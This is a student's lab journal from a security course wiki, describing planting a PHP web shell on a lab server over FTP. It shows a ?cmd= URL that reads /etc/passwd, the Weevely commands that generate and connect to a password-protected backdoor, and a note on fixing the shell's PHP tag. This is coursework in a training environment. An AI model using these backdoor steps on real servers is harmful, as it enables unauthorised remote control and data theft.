Lab 8.1 ‐ Weevely ‐ Jm - Jacob-Mayotte/SEC335_Tech_Journal GitHub Wiki

Deliverable 1:

image

To do this I used the file: mayotte_backdoor3.php

image

  • ftp [email protected]
  • cd upload
  • lcd [path to local directory that the backdoor lives in]
  • should see the file after running an ls:

image

Then I opened a firefox browser and searched: http://10.0.5.25/upload/mayotte_backdoor3.php?cmd=cat+/etc/passwd

image

Then I opened WireShark and used a port 80 capture filter and was able to follow the tcp stream and find the contents:

image

Deliverable 2: Weevely

Using Weevely I generated a PHP backdoor: weevely generate guest JM_weeve.php

  • guest is the password I used, replace this with a new password
  • JM_weeve.php is the file that I genereated too

Then I moved back to the 10.0.5.25 server and uploaded jm_weeve.php

image

Since the file is on our target server I went back to my local cmd line and ran:

weevely http://10.0.5.25/upload/JM_weeve.php guest

  • guest is just the password
  • /upload/JM_Weeve is the location where the file resides on the ftp server

image

I then ran id, whoami and received expected output

Deliverable 3:

image

Reflection:

I ran into a hiccup in part 1. I was trying to run the cat+/etc/passwd on 10.0.5.25 but kept receiving the file contents of mayotte_backdoor rather than the file actually executing.

The file:

image

The issue was that I was missing php after the <? at the start of the file. Once I changed this and ran this file it worked.